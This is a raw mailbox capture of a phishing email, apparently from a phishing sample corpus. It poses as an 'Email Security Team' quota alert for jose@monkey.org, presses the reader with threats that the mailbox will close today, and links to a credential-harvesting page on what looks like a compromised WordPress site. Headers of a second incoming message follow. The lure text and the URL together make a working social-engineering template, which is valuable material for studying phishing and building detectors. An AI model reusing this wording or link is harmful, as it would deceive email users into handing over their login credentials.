From: " Email service "  <sales@cottonink.co.id  >
Date: Thu, 08 Jun 2017 17:45:08 +0100
Status: O
X-Status: 
X-Keywords:                  
X-UID: 213

You will not see this in a MIME-aware mail reader.
--===============0151884235==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

    =

    =

    Email Storage Alert =

for - Account User: jose@monkey.org =

  =

   =

    =

     We noticed that you are almost out of the mailbox quota (jose@monkey.o=
rg) =

 Soon you will no longer be able to receive or send new messages.
Now, you need to upgrade your mail quota to 15GB free =

 We strongly recommend that you upgrade your account now, else outgoing/inc=
oming activities will be limited. =

 Click here to upgrade your E-mail account now =

 After upgrade, uour mailbox <jose@monkey.org>will be closed today, if you =
do not upgrade to 15GB. =




 Source: Email Security Team =

=20
--===============0151884235==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><META http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"></head><body><BR>
<TABLE border=3D0 width=3D550 align=3Dcenter>
<TBODY>
<TR>
<TD>
<TABLE width=3D570 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"BORDER-BOTTOM: #b40404 1px solid; BORDER-LEFT: #b40404 1px sol=
id; PADDING-BOTTOM: 10px; BACKGROUND-COLOR: #b40404; PADDING-LEFT: 10px; WI=
DTH: 570px; PADDING-RIGHT: 10px; FONT-FAMILY: Verdana; HEIGHT: 80px; COLOR:=
 #ffffff; FONT-SIZE: 18px; BORDER-TOP: #b40404 1px solid; BORDER-RIGHT: #b4=
0404 1px solid; PADDING-TOP: 10px; border-radius: 6px">
<TABLE align=3Dcenter>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><FONT color=3D#ffffff size=3D+2 face=3D"Lucida Grande, =
Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif">Email&n=
bsp;Storage Alert <BR><FONT size=3D2>for - Account User: </FONT><FONT size=
=3D+1>jose@monkey.org </FONT></FONT></DIV></TD></TR></TBODY></TABLE></TD></=
TR></TBODY></TABLE></TD></TR>
<TR>
<TD height=3D20></TD></TR>
<TR>
<TD>
<TABLE width=3D570 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"BORDER-BOTTOM: #b40404 1px solid; BORDER-LEFT: #b40404 1px sol=
id; PADDING-BOTTOM: 10px; BACKGROUND-COLOR: #ffffff; PADDING-LEFT: 10px; WI=
DTH: 470px; PADDING-RIGHT: 10px; FONT-FAMILY: Verdana; HEIGHT: 200px; COLOR=
: #ffffff; FONT-SIZE: 18px; BORDER-TOP: #b40404 1px solid; BORDER-RIGHT: #b=
40404 1px solid; PADDING-TOP: 10px; border-radius: 6px">
<TABLE width=3D470 align=3Dcenter>
<TBODY>
<TR>
<TD><FONT color=3D#000000 size=3D2 face=3D"Lucida Grande, Lucida Sans Unico=
de, Lucida Sans, DejaVu Sans, Verdana, sans-serif">
<DIV align=3Dleft>
<P>We noticed that you are almost out of the mailbox quota <FONT color=3D#b=
40404>(jose@monkey.org) </FONT></P>
<P>Soon you will no longer be able to receive or send new messages.<BR>Now,=
 you need to upgrade your mail quota to 15GB free </P>
<P>We strongly recommend that you upgrade your account now, else outgoing/i=
ncoming activities will be limited. </P>
<P><A href=3D"http://aunlianplastic.com/wp-admin/network/loke/setup.php" ta=
rget=3D_blank>Click here to upgrade your E-mail account now </A></P>
<P>After upgrade, uour mailbox <jose@monkey.org>will be closed today, if yo=
u do not upgrade to 15GB. <BR></P></DIV></FONT></TD></TR></TBODY></TABLE></=
TD></TR></TBODY></TABLE><BR><FONT color=3D#000000 size=3D2 face=3D"Lucida G=
rande, Lucida Sans Unicode, Lucida Sans, DejaVu Sans, Verdana, sans-serif">
<DIV align=3Dcenter>Source: <B>Email Security Team</B> </DIV></FONT></TD></=
TR></TBODY></TABLE>
<DIV></DIV></BODY></HTML>
--===============0151884235==--

From jose@monkey.org Thu Jun  8 20:22:51 2017 +0000
Return-Path: speedy8047@belroncanada.com
Delivered-To: jose@monkey.org
X-FDA: 72930003342.04.frame30_35f53d1bb4225
X-Spam-Summary: 69,4.5,0,c0d1e1bdb6b5c2f4,d41d8cd98f00b204,speedy8047@belroncanada.com,,RULES_HIT:10:41:72:355:379:960:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1544:1567:1575:1588:1589:1592:1594:1711:1714:1719:1730:1777:1792:2194:2199:2525:2527:2528:2566:2610:2682:2685:2859:2890:2892:2894:2915:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3421:3740:3747:3865:3866:3867:3868:3870:3871:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4321:4361:5007:6117:6238:6658:6659:6671:6672:6678:6679:6684:8583:8603:8634:8957:9025:9108:9388:9855:9908:10004:10214:10243:10346:10920:11245:11656:11658:11855:11914:12043:12438:12519:12555:12657:12660:12661:12986:13007:13008:13019:13139:13237:13439:14096:14141:14181:14655:14659:14721:14849:14885:21433:21436:21450:21451:21627:30001:30022:30054:30070:30075,0,RBL:206.186.120.17:@belroncanada.com:.lbl8.mailshell.net-62.34.55.100 64.100.201.10
X-HE-Tag: frame30_35f53d1bb4225
X-Filterd-Recvd-Size: 7569
Received: from SPMAILGWMTL01.BELRONCANADA.COM (mail.belroncanada.com [206.186.120.17])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  8 Jun 2017 20:22:50 +0000 (UTC)
Received: from SPMAILGWMTL01.BELRONCANADA.COM (unknown [127.0.0.1])
	by IMSVA80 (Postfix) with ESMTP id 8F30DF79B6;
	Thu,  8 Jun 2017 17:55:24 -0400 (EDT)
Received: from SPEXCMTL01.belroncanada.com (unknown [172.17.200.18])
	by SPMAILGWMTL01.BELRONCANADA.COM (Postfix) with ESMTP id 517D6F7998;
	Thu,  8 Jun 2017 17:55:24 -0400 (EDT)
Received: from SPEXCMTL01.belroncanada.com ([::1]) by
 SPEXCMTL01.belroncanada.com ([::1]) with mapi; Thu, 8 Jun 2017 16:22:44 -0400
